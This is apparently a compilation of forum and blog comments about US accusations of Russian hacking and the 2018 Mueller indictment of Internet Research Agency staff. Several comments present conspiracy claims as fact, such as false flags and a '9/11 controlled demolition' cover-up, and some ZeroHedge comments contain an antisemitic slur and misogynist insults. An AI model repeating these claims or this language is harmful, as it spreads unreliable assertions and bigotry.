Now when the statement is out of the WH we might expect a refined follow-up by the National Security organs, TNYT, TWP, etc. The intended audience are https://en.wikipedia.org/wiki/Little_Eichmanns

It is very good that you posted that photo of Colin Powell in the context of the article. It says a lot, if not all.

integer , Feb 16, 2018 8:02:09 AM | 11
In a Euromaidan Press article dated November 2nd, 2016, the hackers state enthusiastically "Ukrainian hackers have a rather high level of work. So the help of the USA I don't know, why would we need it? We have all the talent and special means for this. And I don't think that the USA or any NATO country would make such sharp movements in international politics."

From: Untying PropOrNot: Who They Are and a Look at 2017's Biggest Fake News Story

Christian Chuba , Feb 16, 2018 8:15:13 AM | 12
On the Tucker Carlson Show an FBI agent defended the fact that they could not identify the school shooter, prior to the event, even after he was reported, because his one post did not identify himself explicitly. Also, the threat was not enough to open an investigation.

So now the same group of people claim the ability to discover that people are 'Russian Trolls' from a specific building in St. Petersburg simply based on the content of purely political posts to facebook and twitter.

Partisan , Feb 16, 2018 8:23:03 AM | 13
By following, a little bit, the US National Security operation called Cryptocurrency (ies), allegedly based in South Korea and Japan, I noticed a number of hackings of the web sites of companies that are in this, let's-call-it-business.

The most famous hacking was the Mt.Gox (Japan based) one, where a French national was the business's principal. The money was never recovered, and the hacker is still unknown!? I guess the place of business and the CEO (all US client states) were meant to give legitimacy to cryptocurrency and lure fools into buying the "fog". But where did "investors'" money go? Not to brilliant Russians... and how could that be? There is a lot of money in the game, real money.

Have the National Security State agencies transferred looting from the domestic soil to the international one with the help of virtual reality? No trace of hackers, none!?

Partisan , Feb 16, 2018 9:06:43 AM | 14
I use the term The US National Security State (or Deep State) and its apparatus as synonymous with the Nazi Reich Main Security Office. While the two differ in methods and size, their goals and objectives are the same.
integer , Feb 16, 2018 9:12:50 AM | 15
Having just had a quick look into the NotPetya attack, it appears to have begun on the morning of the day before Ukraine's Constitution Day, and originated from the update server of a Ukrainian tax accounting program called MeDoc. I expect this was another Ukrainian false flag; a cyber warfare version of MH17. Sharp movements in international politics indeed.
Partisan , Feb 16, 2018 9:23:02 AM | 16
integer | Feb 16, 2018 9:12:50 AM | 15

Meaning what? A client state was forced into this in order (to blame Russkies) to get another tranches of loan from the IMF?

susetta , Feb 16, 2018 9:53:35 AM | 17
Well that may mean that, under the new dictate (now the United States will not just use its nuclear weapons as a response if the other party used them; now the United States has declared that it will use nuclear weapons if, say, there should be a virus attack on its networks), the United States is about to declare war on Russia and proceed to nuke it.
AriusArmenian , Feb 16, 2018 11:59:07 AM | 20
"We can only hope that these new accusations will have less severe consequences."

The russophobic fake news push is not letting up and now the Trump administration has jumped on board. And on top of targeting Iran has also ramped up targeting China.

This is how the last Cold War ramped up. The public was softened up by the media to fear the USSR. It's a symptom of a disease in its psyche spreading throughout the West.

We see through this nonsense but I fear we underestimate the danger. This Cold War v2 is already much hotter than v1. The West is approaching the throat of the East (Russia, China, Iran, and others), and unfortunately for the world the West feels (it has limited capability to think) it must prevail over the East or face extinction. And what does that suggest might happen?

Petri Krohn , Feb 16, 2018 12:01:35 PM | 21
CrowdStrike said Russians known as Fancy Bear hacked the DNC. U.S. Department of Homeland Security identified one of the "Russian" malware tools used and named it "Grizzly Steppe" or "PAS tool PHP web kit". Later it was also found to attack U.S. power utilities.

I tracked down the creator of the malware and found out that he was a 23-year old Ukrainian university student at the Poltava National Technical University.

Did a Ukrainian University Student Create Grizzly Steppe?

3) The profexer site presents an SSL certificate that identifies it as pro-os.ru and gives an email address...

Almost a year later the New York Times reported the same story, but did not name the Ukrainian hacker.

In Ukraine, a Malware Expert Who Could Blow the Whistle on Russian Hacking

But while Profexer's online persona vanished, a flesh-and-blood person has emerged: a fearful man who the Ukrainian police said turned himself in early this year, and has now become a witness for the F.B.I.

Mr. Gerashchenko described the author only in broad strokes, to protect his safety, as a young man from a provincial Ukrainian city. He confirmed that the author turned himself in to the police and was cooperating as a witness in the D.N.C. investigation. "He was a freelancer and now he is a valuable witness," Mr. Gerashchenko said.

"Fancy Bear" is not the Russian military intelligence agency GRU or any other Russian government agency. It is simply a collection of hacking tools available online on Runet, the Russian language part of the Internet and the Russian language darknet.

james , Feb 16, 2018 12:04:41 PM | 22
thanks b.. more of the same bullshit.. "The U.S. is simply asserting this while presenting nothing to back it up."

from b's post - "In 2009 Russia offered an international treaty to prohibit cyber attacks. It was the U.S. under Obama which rejected it as "unnecessary" while it was expanding its own attack capabilities."

this from the link in the above quote..

"The United States argues that a treaty is unnecessary. It instead advocates improved cooperation among international law-enforcement groups. If these groups cooperate to make cyberspace more secure against criminal intrusions, their work will also make cyberspace more secure against military campaigns, American officials say."

5 eyes is doing such a great job of being like some stupid chorus line in a bad movie... all of them are beholden to the usa and the usa, as noted above - doesn't need any proof... what does that say about the usa?

willful blindness...

Shakesvshav , Feb 16, 2018 12:13:40 PM | 24
A small cause for celebration here in the UK: https://www.hackread.com/british-hacker-lauri-love-will-not-be-extradited-to-usa/
james , Feb 16, 2018 12:18:58 PM | 25
@24 shakesvshav - it's a good thing they weren't caught up in some allegation based in sweden which the swedes wanted to drop, but the uk/usa discouraged them from doing... i am thinking of julian assange here - stuck in the ecuador embassy in the uk.. craig murray did a couple of articles on this the past few days which kind of makes one want to puke especially if one lives in the uk...

nice to see an opportunity for celebration come your way!

https://www.craigmurray.org.uk/

J Swift , Feb 16, 2018 12:22:15 PM | 26
@integer 15 "I expect this was another Ukrainian false flag; a cyber warfare version of MH17"

Not as crazy as it sounds. Hell, the CIA and SBU literally share a building! And this code apparently does not have the hallmark elegance of Russian hackers. Why not get a good swipe at Russian businesses, while destroying enough data (evidence) in Ukraine to cover a multitude of sins (just like at least one of the ammo dump explosions is strongly suspected as having been intentionally set to cover up missing inventory which now no doubt resides in Syria). And then the icing on the cake is to get to blame Russia and try to bolster rapidly failing support for sanctions. A lot more plausible than a half-baked Russian attack.

[Feb 16, 2018] Mueller Indicts 13 Russians For Interfering In US Election

False flag or real?
Is not "included supporting the presidential campaign of then-candidate Donald J. Trump ("Trump Campaign") and disparaging Hillary Clinton." (or vice versa) by posting on social media an example of free speech?
But usage of fake identities clearly is not: "The Russians tracked the metrics of their effort in reports and budgeted for their efforts. Some, as described below, traveled to the U.S. to gather intelligence for the surreptitious campaign. They used stolen U.S. identities, including fake driver's licenses, and contacted news media outlets to promote their activities."
The question is how those unquestionably very talented Russians managed to learn the English language without living in the USA and operate such a sophisticated operation from overseas? English is a very difficult language for Russians to master, and Russian immigrants who came to the USA being older than 16 and living in the USA for ten or twenty years typically still have a horrible accent and bad or very bad grammar (tenses, "a" and "the" usage, you name it). Actually Russian women are noticeably better than men in this area, especially if they are married to a US spouse. Add to this a dismal understanding of USA politics, including the differences between the Democratic and Republican parties (you probably need to live in the USA for ten years to start appreciating those differences ;-). How did they manage to learn the local political culture well enough to be effective? That's a strong argument in favor of a false flag operation -- if they had puppeteers from the USA, everything is more or less rationally explainable.
Notable quotes:
"... It gets better: the defendants reportedly worked day and night shifts to pump out messages, controlling pages targeting a range of issues, including immigration, Black Lives Matter, and they amassed hundreds of thousands of followers. They set up and used servers inside the U.S. to mask the Russian origin of the accounts. ..."
"... The Russian organization named in the indictment - the Internet Research Agency - and the defendants began working in 2014 - so one year before the Trump candidacy was even announced - to interfere in U.S. elections, according to the indictment in Washington. They used false personas and social media while also staging political rallies and communicating with "unwitting individuals" associated with the Trump campaign, it said. ..."
"... The Russians tracked the metrics of their effort in reports and budgeted for their efforts. Some, as described below, traveled to the U.S. to gather intelligence for the surreptitious campaign. They used stolen U.S. identities, including fake driver's licenses, and contacted news media outlets to promote their activities. ..."
"... Defendant ORGANIZATION had a strategic goal to sow discord in the U.S. political system, including the 2016 U.S. presidential election. Defendants posted derogatory information about a number of candidates, and by early to mid-2016, Defendants' operations included supporting the presidential campaign of then-candidate Donald J. Trump ("Trump Campaign") and disparaging Hillary Clinton. ..."
"... Defendants, posing as U.S. persons and creating false U.S. personas, operated social media pages and groups designed to attract U.S. audiences. These groups and pages, which addressed divisive U.S. political and social issues, falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by Defendants. Defendants also used the stolen identities of real U.S. persons to post on ORGANIZATION-controlled social media accounts. Over time, these social media accounts became Defendants' means to reach significant numbers of Americans for purposes of interfering with the U.S. political system, including the presidential election of 2016. ..."
"... Sixteen thousand Facebook users said that they planned to attend a Trump protest on Nov. 12, 2016, organized by the Facebook page for BlackMattersUS, a Russian-linked group that sought to capitalize on racial tensions between black and white Americans. The event was shared with 61,000 users. ..."
"... As many as 5,000 to 10,000 protesters actually convened at Manhattan's Union Square. They then marched to Trump Tower, according to media reports at the time. ..."
"... 13 Russians can influence US elections meanwhile US CIA and State Department spend $1 BIllion every year on opposition groups inside Russia without success. ..."
"... Indict AIPAC. That is the real foreign interference in ALL US elections. Such hypocrisy. At the very least, make them register as a foreign operation! Information warfare using social media? What, you mean like the Israeli students who are paid to shape public opinion thru social media? This is no secret and has been in the news. I fail to find the difference? Psychologists call this projection, that is where you accuse others of the crimes you commit. ..."
"... It looks like Mueller would have these people for identity theft if he had them in the US, which he probably doesn't. ..."
"... Deep state pivot to keep the Russian hate alive. ..."
"... Fucking hilarious - Mueller has indicted an anti-Russian CIA operation that was run out of St. Petersburg. http://thesaker.is/a-brief-history-of-the-kremlin-trolls/ ..."
"... The bigger question is "when is Mueller going to be indicted for covering up the controlled demolition of the WTC buildings on nine eleven??" ..."
Feb 16, 2018 | www.zerohedge.com

Mueller charges "defendants knowingly and intentionally conspired with each other (and with persons known and unknown to the Grand Jury) to defraud the United States by impairing, obstructing, and defeating the lawful functions of the government through fraud and deceit for the purpose of interfering with the U.S. political and electoral processes, including the presidential election of 2016."

The indictment adds that the Russians " were instructed to post content that focused on 'politics in the USA' and to 'use any opportunity to criticize Hillary and the rest (except Sanders and Trump -- we support them)' ."

It gets better: the defendants reportedly worked day and night shifts to pump out messages, controlling pages targeting a range of issues, including immigration, Black Lives Matter, and they amassed hundreds of thousands of followers. They set up and used servers inside the U.S. to mask the Russian origin of the accounts.

Ultimately, and this is the punchline, the goal was to disparage Hillary Clinton and to assist the election of Donald Trump.

In other words, anyone who was disparaging Clinton, may have "unwittingly" been a collaborator of the 13 Russian "specialists" who cost Hillary the election.

The Russian organization named in the indictment - the Internet Research Agency - and the defendants began working in 2014 - so one year before the Trump candidacy was even announced - to interfere in U.S. elections, according to the indictment in Washington. They used false personas and social media while also staging political rallies and communicating with "unwitting individuals" associated with the Trump campaign, it said.

The Russians "had a strategic goal to sow discord in the U.S. political system," according to the indictment in Washington.

The Russians also reportedly bought advertisements on U.S. social media and created numerous Twitter accounts designed to appear as if they were U.S. groups or people, according to the indictment. One fake account, @TEN_GOP, attracted more than 100,000 online followers.

The Russians tracked the metrics of their effort in reports and budgeted for their efforts. Some, as described below, traveled to the U.S. to gather intelligence for the surreptitious campaign. They used stolen U.S. identities, including fake driver's licenses, and contacted news media outlets to promote their activities.

The full list of named defendants in addition to the Internet Research Agency, as well as Concord Management and Consulting and Concord Catering, include:

Mueller's office said that none of the defendants was in custody.

So how is Trump involved? Well, he isn't, as it now seems that the collusion narrative is dead, and instead Russian involvement was unilateral. Instead, according to the indictment, the Russian operations were unsolicited and pro bono, and included "supporting Trump... and disparaging Hillary Clinton," staging political rallies, buying political advertising while posing as grassroots U.S. groups. Oh, and communicating "with unwitting individuals associated with the Trump Campaign and with other political activists to seek to coordinate political activities."

Defendant ORGANIZATION had a strategic goal to sow discord in the U.S. political system, including the 2016 U.S. presidential election. Defendants posted derogatory information about a number of candidates, and by early to mid-2016, Defendants' operations included supporting the presidential campaign of then-candidate Donald J. Trump ("Trump Campaign") and disparaging Hillary Clinton.

Defendants made various expenditures to carry out those activities, including buying political advertisements on social media in the names of U.S. persons and entities. Defendants also staged political rallies inside the United States, and while posing as U.S. grassroots entities and U.S. persons, and without revealing their Russian identities and ORGANIZATION affiliation, solicited and compensated real U.S. persons to promote or disparage candidates. Some Defendants, posing as U.S. persons and without revealing their Russian association, communicated with unwitting individuals associated with the Trump Campaign and with other political activists to seek to coordinate political activities.

Furthermore, the dastardly Russians created fake accounts to pretend they are Americans:

Defendants, posing as U.S. persons and creating false U.S. personas, operated social media pages and groups designed to attract U.S. audiences. These groups and pages, which addressed divisive U.S. political and social issues, falsely claimed to be controlled by U.S. activists when, in fact, they were controlled by Defendants. Defendants also used the stolen identities of real U.S. persons to post on ORGANIZATION-controlled social media accounts. Over time, these social media accounts became Defendants' means to reach significant numbers of Americans for purposes of interfering with the U.S. political system, including the presidential election of 2016.

Mueller also alleges a combination of traditional and modern espionage...

Certain Defendants traveled to the United States under false pretenses for the purpose of collecting intelligence to inform Defendants' operations. Defendants also procured and used computer infrastructure, based partly in the United States, to hide the Russian origin of their activities and to avoid detection by U.S. regulators and law enforcement.

Mueller also charges that two of the defendants received US visas and that from approximately June 4, 2014 through June 26, 2014, KRYLOVA and BOGACHEVA "traveled in and around the United States, including stops in Nevada, California, New Mexico, Colorado, Illinois, Michigan, Louisiana, Texas, and New York to gather intelligence. After the trip, KRYLOVA and BURCHIK exchanged an intelligence report regarding the trip."

* * *

The indictment points to a broader conspiracy beyond the pages of the indictment, saying the grand jury has heard about other people with whom the Russians allegedly conspired in their efforts.


Joe Davola -> Pandelis Fri, 02/16/2018 - 13:02 Permalink

Concord Catering - what, were they offering chicken wings and pigs ears at the polling places?

Never One Roach -> Joe Davola Fri, 02/16/2018 - 13:03 Permalink

So how often does Mueller hear those demon voices in his head?

Billy the Poet -> Never One Roach Fri, 02/16/2018 - 13:05 Permalink

I wonder if any of these Russians were behind the anti-Trump rallies of November 2016? Thousands attended protest organized by Russians on Facebook.

Thousands of Americans attended a march last November organized by a Russian group that used social media to interfere in the 2016 election.

The demonstration in New York City, which took place a few days after the election, appears to be the largest and most successful known effort to date pulled off by Russian-linked groups intent on using social media platforms to influence American politics.

Sixteen thousand Facebook users said that they planned to attend a Trump protest on Nov. 12, 2016, organized by the Facebook page for BlackMattersUS, a Russian-linked group that sought to capitalize on racial tensions between black and white Americans. The event was shared with 61,000 users.

As many as 5,000 to 10,000 protesters actually convened at Manhattan's Union Square. They then marched to Trump Tower, according to media reports at the time.

The BlackMattersUS-organized rally took advantage of outrage among groups on the left following President Trump's victory on Nov. 8 to galvanize support for its event. The group's protest was the fourth consecutive anti-Trump rally in New York following election night, and one of many across the country.

"Join us in the streets! Stop Trump and his bigoted agenda!" reads the Facebook event page for the rally. "Divided is the reason we just fell. We must unite despite our differences to stop HATE from ruling the land."

http://thehill.com/policy/technology/358025-thousands-attended-protest-

Belrev -> Billy the Poet Fri, 02/16/2018 - 13:07 Permalink

13 Russians can influence US elections; meanwhile the US CIA and State Department spend $1 Billion every year on opposition groups inside Russia without success.

SamAdams -> Belrev Fri, 02/16/2018 - 13:08 Permalink

Indict AIPAC. That is the real foreign interference in ALL US elections. Such hypocrisy. At the very least, make them register as a foreign operation! Information warfare using social media? What, you mean like the Israeli students who are paid to shape public opinion thru social media? This is no secret and has been in the news. I fail to find the difference? Psychologists call this projection, that is where you accuse others of the crimes you commit.

Belrev -> SamAdams Fri, 02/16/2018 - 13:10 Permalink

That is a regime change in DC proposition.

IH8OBAMA -> Belrev Fri, 02/16/2018 - 13:21 Permalink

If Mueller is going outside the Trump organization to indict Russians, when is he going to indict some equally criminal Democraps?

I also see that one of the 13 Russians was Valdimir. ( VLADIMIR VENKOV ) LOL

Shillinlikeavillan -> IH8OBAMA Fri, 02/16/2018 - 13:24 Permalink

Soooooooo...

They basically indicted the $100,000 facebook ad russian group... Bravo! Ur really on the path to impeaching trump now!
LULZ!

overbet -> Shillinlikeavillan Fri, 02/16/2018 - 13:34 Permalink

Boy, Hillary sure didn't get her money's worth. She shoulda hired these people.

Is it ok for the MSM to make all of their disparaging commentary, but not ok for people to do the same? Mueller must've forgot about the craigslist ads hiring protesters to attack Trump rallies. What a fucking clown show.

I guess that's it. Mueller gets his indictments to save face and Trump is pleased it's over.

El Vaquero -> overbet Fri, 02/16/2018 - 13:44 Permalink

This ties directly into the October 31, 2017 testimony from Facebook, Twitter and Google regarding Russian media presence on social media. Mueller is grasping here, and given that it talks about visas granted for short visits, I'm led to believe that most of these people are actually not on US soil to be arrested. This means political grandstanding via an indictment that is never going to see a courtroom where the evidence can be examined and witnesses can be cross examined. It looks like Mueller would have these people for identity theft if he had them in the US, which he probably doesn't.

I'm going to get called a Russian bot over this elsewhere. Well, maybe facetiously here. #WeAreAllRussianBotsNow

spanish inquisition -> El Vaquero Fri, 02/16/2018 - 13:56 Permalink

Deep state pivot to keep the Russian hate alive.

FoggyWorld -> spanish inquisition Fri, 02/16/2018 - 13:59 Permalink

And set us up for war.

Shemp 4 Victory -> FoggyWorld Fri, 02/16/2018 - 14:10 Permalink

Fucking hilarious - Mueller has indicted an anti-Russian CIA operation that was run out of St. Petersburg. http://thesaker.is/a-brief-history-of-the-kremlin-trolls/

pods -> Shemp 4 Victory Fri, 02/16/2018 - 14:22 Permalink

Wow, I am going to have to keep the radio off for a couple of days. They are going to be wall to wall on this. Maybe even bump the stories where fakely sympathetic reporter cunts (FSRC) ask mother's if they miss their dead kids.

This is a fucking clownshow anymore. Jesus, THIS is what the investigation brought home? Holy fuckshit, this is a joke. Some guy had 100k followers? Really? Like anyone GAF about that? We have AIPAC making candidates kneel before them and yet some guys on Tweeter fucked around. I think that is even bullshit. If Russians really did that, they wouldn't "work in shifts" they would program some fucking bots to do this.

I can just imagine the fake outrage that that worthless kike from NY Chuckie "don't get between me and a camera" Schumer has to say about this.

This is a Matrix alright, and a cheap ass one at that.

Mueller should be taken out and horsewhipped for bringing this shit home.

Hey Mueller, I read a comment on Yahoo news that was in broken English. Go get um!


stizazz -> pods Fri, 02/16/2018 - 14:30 Permalink

They HATE Russia because PUTIN OPENLY derided the American Empire.

BennyBoy -> pods Fri, 02/16/2018 - 14:38 Permalink

The Russians duped me.

I was gonna vote for Hillary, then I read tweets where she bullied the woman her husband raped to keep quiet. And how her foundation got hundreds of $millions from countries with business before her at the State Dept. ALEKSANDRA YURYEVNA KRYLOVA misled me.

BennyBoy -> BennyBoy Fri, 02/16/2018 - 14:42 Permalink

It's probably nothing....

CHINESE STATE-OWNED CHEMICAL FIRM JOINS DARK MONEY GROUP POURING CASH INTO U.S. ELECTIONS

Lee Fang February 15 2018, 10:10 a.m.

WANHUA CHEMICAL, A $10 billion chemical company controlled by the Chinese government, now has an avenue to influence American elections.

On Monday, Wanhua joined the American Chemistry Council, a lobby organization for chemical manufacturers that is unusually aggressive in intervening in U.S. politics.

The ACC is a prominent recipient of so-called dark money -- that is, unlimited amounts of cash from corporations or individuals the origins of which are only disclosed to the IRS, not the public. During the 2012, 2014, and 2016 election cycles, the ACC took this dark money and spent over $40 million of it on contributions to super PACs, lobbying, and direct expenditures. (Additional money flowed directly to candidates via the ACC's political action committee.) ...

https://theintercept.com/2018/02/15/chinese-state-owned-chemical-firm-j

ThanksChump -> BennyBoy Fri, 02/16/2018 - 14:50 Permalink

Duped by facts and truth is no way to go through life, son.

JimmyJones -> ThanksChump Fri, 02/16/2018 - 15:59 Permalink

Obama, "I can do more after I'm reelected" to Putin caught on a hot mic.

I always knew Hillary was as pure as the first winter's snow.

Theosebes Goodfellow -> pods Fri, 02/16/2018 - 14:42 Permalink

~" In other words, anyone who was disparaging Clinton, may have "unwittingly" been a collaborator of the 13 Russian "specialists" who cost Hillary the election. "~

Wait, does this mean that "disparaging Hillary" was just for the witless? I've been doing that for years, (without any Russian influence at all), and have found it to be rather witty virtually all the time.

Can we NOW get to the point where we appoint a special prosecutor to investigate Hillary?

rwe2late -> Theosebes Goodfellow Fri, 02/16/2018 - 15:09 Permalink

not yet ...

any of us who spread "fake news" are now "conspirators" who gave "support" to foreign agents with the goal of undermining the "democratic process" by denying Hillary the presidency.

tsk, tsk.

ignorance can be no excuse for such wanton lawlessness.

rwe2late -> rwe2late Fri, 02/16/2018 - 15:36 Permalink

oh, oh

I almost forgot. "conspirators" were blatantly "sowing discord" obvious "proof" of "cooperating" with the Russians

Boxed Merlot -> rwe2late Fri, 02/16/2018 - 15:46 Permalink

..."conspirators" were blatantly "sowing discord"...

Yep, so on top of being "Deplorable", I'm also without wit.

His name was Seth.

Squid Viscous -> pods Fri, 02/16/2018 - 14:57 Permalink

well said pods, i wish i could upvote you like, 13 times

Machbet -> pods Fri, 02/16/2018 - 15:32 Permalink

Well said, my brother. "A fucking clownshow..." A clownshow run by juvenile, idiotic fallen angels.

sixsigma cygnu -> spanish inquisition Fri, 02/16/2018 - 14:01 Permalink

I'm just relieved they didn't get Boris. Not this time.

Telling people the truth makes one a very desirable target.

BigCumulusClouds -> sixsigma cygnu Fri, 02/16/2018 - 14:06 Permalink

The bigger question is "when is Mueller going to be indicted for covering up the controlled demolition of the WTC buildings on nine eleven??"

eatthebanksters -> spanish inquisition Fri, 02/16/2018 - 14:10 Permalink

So this is all they have?

Bubba Rum Das -> Citizen in 1984 Fri, 02/16/2018 - 16:08 Permalink

Yes, Mueller is a clown show, but he came up w/ this crap in an attempt to divert media attention away from his & McCabes direct involvement in trying to cover up Uranium 1 for Hillary...The Truth!

Boxed Merlot -> eatthebanksters Fri, 02/16/2018 - 15:48 Permalink

...all they have?...

Sure hope they weren't bettin' the farm.

jmo.

DosZap -> El Vaquero Fri, 02/16/2018 - 15:05 Permalink

He has to INDICT someone, since he can't get Trump except on adultery (the only thing NOT under his purview).

I see a distant MELANIA in his near future.

eclectic syncretist -> DosZap Fri, 02/16/2018 - 15:43 Permalink

The FBI going DEEP (#sarc) into its playbook for this one.

Simultaneously distracting from their incompetencies with regards to domestic threats (school shooters/government collusion to subvert presidential election), and exonerating Hillary AGAIN.

"Using lies and deception to cover our lies and deceptions, so that we can enslave the populace to our will" (visualize Mueller/Comey/Strzok/Page/Ohr/Rosenstein/Obama/Rice with left hands on a Satanic Bible and right arms extended giving the oath in the Temple of Mammon before an upside down American flag).

ebear -> El Vaquero Fri, 02/16/2018 - 15:17 Permalink

"#WeAreAllRussianBotsNow"

Ich bin ein Russe!

agNau -> overbet Fri, 02/16/2018 - 13:59 Permalink

Hillary hired the entire Russian government with the Uranium one deal.

BigCumulusClouds -> overbet Fri, 02/16/2018 - 14:04 Permalink

Protestors?? HRC hired thugs who beat people up at Trump rallies. That's a felony. Some people got hurt real bad.

IH8OBAMA -> Shillinlikeavillan Fri, 02/16/2018 - 13:37 Permalink

I wonder if Mueller is going to indict Obama for interfering in the Israeli election?

giovanni_f -> IH8OBAMA Fri, 02/16/2018 - 13:56 Permalink

1. CNN can now say Russian interference is a "proven fact".

2. "13 individuals" and "3 companies" - this is a casus belli even for the most pacifist peaceniks on ZH

3. The US can now continue to meddle in Russian elections as it has done since 1919, pointing to the existential threat those 13 individuals posed.

rwe2late -> giovanni_f Fri, 02/16/2018 - 15:46 Permalink

worse than 3. meddling in Russian elections,

anyone who objects to US military and economic aggression,

will be further branded/dismissed (prosecuted?)

as a "proven dupe" of Russia/Putin.

caconhma -> IH8OBAMA Fri, 02/16/2018 - 14:08 Permalink

The US Constitution. RIP

The DoJ and Mueller activities are anti-American. What else is new in occupied America?

PS

Note Trump does nothing about this unprecedented assault on Freedom of Speech and Assembly in the USA. Therefore, Trump is a willing player in these criminal activities.

commiebastid -> IH8OBAMA Fri, 02/16/2018 - 14:21 Permalink

and Brexit and the French election and Venezuela election and The Ukraine; Libya; Palestinian Territories..... lmao

DownWithYogaPants -> Shillinlikeavillan Fri, 02/16/2018 - 13:44 Permalink

Ohhh fake social accounts.........the horror!

( If I had known they were the equivalent of Harry Potters magic wand I would have opened a few long ago! )

Seems like Mr Mueller is in face saving mode.

What is Rod Rosenstein doing still at the FBI? He should be in prison.

MEFOBILLS -> Shillinlikeavillan Fri, 02/16/2018 - 14:50 Permalink

Mueller is going to go until he gets some meat. Maybe this lean and stringy meat is enough to satisfy. Of course, nobody will look at AIPAC and all of the foreign influence money funneling into senators coffers.

Endgame Napoleon -> carni Fri, 02/16/2018 - 14:26 Permalink

He said they stole identities, posting anti-Hillary remarks on Russian-controlled sites, using the stolen identities. They must do that through hacking, which is illegal.

They also organized rallies, he said. There were ads on job sites, advertising for paid [leftist] protestors, long before Trump emerged as a candidate. People posted them on American sites. Some attribute it to Soros. I am a little skeptical that Soros controls the world, anymore than Russians, but that is what people often believe, when it is leftist ads.

Advertisements are all over the Internet. Is that illegal? He called it fraud, referring to the misrepresentation of identity, I guess. They should not be manipulating unknowing people.

But, I wonder if he has the same vigilance when illegal aliens use fake SS cards to acquire jobs, while their girlfriends use real SS cards of US-born kids to get $450 on average in EBT food assistance, in addition to other welfare, making it easy for illegal aliens to undercut American citizens in jobs. Using a fake SS number -- i.e. posing as an American to get a job -- is fraud.

As long as the illegal aliens have sex after illegal border crossings, reproduce and say they misrepresent their identities for the good of their kids, this is legal and deserving of pay-per-birth welfare / child-tax-credit freebies and citizenship, whereas these Russians are committing fraud.

They should not be doing that in either case, but the double standard is interesting.

And if people cannot post freely on the internet without revealing their real names, a lot of internet activity (and a lot of related commerce) will cease. Many people post anonymously, often due to jobs or other factors that have nothing to do with elections.

In fact, FBI agents post under identities (personas) that are not their own. There are many articles, describing how police agencies use fake identities on the internet to track down criminals, including those who abuse children. They do the same thing to monitor terrorists; they use fake identities.

[Feb 16, 2018] Where are these indictments ? Obama, Hillary Clinton, Victoria Nuland, Geoffrey Pyatt and John McCain.

Feb 16, 2018 | www.zerohedge.com


Mike Masr Fri, 02/16/2018 - 15:41 Permalink

Where are these indictments ? Obama, Hillary Clinton, Victoria Nuland, Geoffrey Pyatt and John McCain.

The US has been meddling and interfering in other countries elections and internal affairs for decades. Not only does the US meddle and interfere in other countries elections it overthrows democratically elected governments it simply doesn't like, and then installs its own puppet leaders. Our deep-state MIC owned neocons casually refer to this as "regime change".

I can only imagine the hell that would break loose if Russia fomented, paid for, and assisted in a violent overthrow of the legitimately and democratically elected government in Mexico. Imagine Russian spymasters working from the Russian Embassy in Mexico City training radicals how to use social media to bring out angry people and foment violent public unrest. Then Russian Duma members in Mexico City handing out tacos and tamales, emboldening and urging these angry people to riot, overthrow the government and toss the bums out. Then Putin's executive group hand picking all the new (anti-USA) drug cartel junta puppet leaders, and an old senile Russian senator in Mexico City stating at a podium on RT: there are no drug cartels here, that's all propaganda!

On the other side of the world Obama's neocon warmongers spent billions doing exactly this. Instead of drug cartels it was Banderist Neo-Nazis. Obama and our neocons, including John McCain intentionally caused all of this fucking mess, civil war and horrific death in Ukraine on Russia's border and then placed the blame on Putin and Russia.

Thanks to John McCain and our evil fucking neocons - the regime change policy implemented by Obama, Clinton and Nuland's minions, like Geoffrey Pyatt, the Ukraine today is totally fucked. It is now a corrupt banana republic embroiled in a bloody civil war. For the US and NATO the golden prize of this violent undemocratic regime change was supposed to be the Crimea. This scheme did not play out as intended. No matter what sanctions the warmongering neocons place on Russia they will NEVER give back the Crimea!

Our neocon fuck heads spent billions of our hard earned taxpayer dollars to create pain, suffering, death and a civil war in Ukraine on the border with Russia.

This is a case of don't do what we do, only do what we tell you to do. It's perfectly okay when we meddle. We don't like it when we think it may have been done to us. It's hypocrisy and duplicity at its finest!

Tech Camp NGO - operating out of US Embassy in Kiev

(using social media to help bring out radicals-and cause civil war-pre Maidan 2013)

https://www.youtube.com/watch?v=y9hOl8TuBUM

Nuland talks about $5 billion spent on Ukraine

https://www.youtube.com/watch?v=eaR1_an9CnQ

Nuland plotting (on intercepted phone call) the new handpicked puppet leaders.

https://www.youtube.com/watch?v=CL_GShyGv3o

US Support of Banderist Neo-Nazis in Ukraine 2014

https://www.youtube.com/watch?v=8-RyOaFwcEw

Lavrov reminds the UN a West-inspired coup d'état started the Ukraine crisis, not Russia

https://www.rt.com/op-edge/404247-un-lavrov-ukraine-sanctions/

[Feb 16, 2018] What is the definition of a fake social media account? What is the crime for operating a fake social media account? Is this the standard by which we will all be judged?

Feb 16, 2018 | www.zerohedge.com

Genby Fri, 02/16/2018 - 14:51 Permalink

Mueller effectively called himself an idiot and degenerate.

13 people won against the whole apparatus of FBI (including Mueller). That makes FBI a herd of idiots and degenerates (including Mueller).

SirBarksAlot -> rgraf Fri, 02/16/2018 - 16:44 Permalink

What crime?

Impersonating an American?

Practicing freedom of speech?

Trying to influence an election?

I don't see any crimes.

Joiningupthedots Fri, 02/16/2018 - 14:31 Permalink

When does Mueller get charged?

He is part of the fabric of the Clinton Gang along with Comey and others.

How many people have posted derogatory comments about Clinton on ZH alone.

This sounds like when they ludicrously charged an entire unit of the Chinese PLA.

FringeImaginigs Fri, 02/16/2018 - 14:31 Permalink

Agreed, it's against the law to steal identities and operate bank accounts and all that. But really, compared to the fraud committed by just one bank - Wells Fargo - this is small potatoes. And did I miss it, or did the indictment not even mention the value of the ads bought on Facebook - $100,000 (nope, not missing any zeros). And it all started in 2014 while Donald was playing golf and sticking his dick in some whore. And a few ruskies got into the good ol' USofA with false statements on their visas. While the courts fought Trump on the fact that immigration from a few countries needed to be stopped because there was no way of checking data. I get it - somebody driving too fast gets a speeding ticket, and Mueller's investigation gets to issue an indictment. I'm sure we all feel better now.

Lostinfortwalton Fri, 02/16/2018 - 14:32 Permalink

So, did Mueller address the crime committed by the then FBI head who refused to allow a FBI informant to address Congress on the Uranium One scam before it was authorized? Uh, that would be Mueller, his very self, so the answer is no.

soyungato Fri, 02/16/2018 - 14:33 Permalink

Bob honey, the people are laughing.

But but but those Russians, they call me names.

Grandad Grumps Fri, 02/16/2018 - 14:35 Permalink

What is the definition of a "fake social media account"? What is the crime for operating a fake social media account? Is this the standard by which we will all be judged?

Or is it that Mueller has NOTHING and is too big of a corrupt idiot to admit it.

Rick Cerone Fri, 02/16/2018 - 14:36 Permalink

Putin should define what an NGO is.

He should tell the world how the US uses NGOs to destabilize elections.

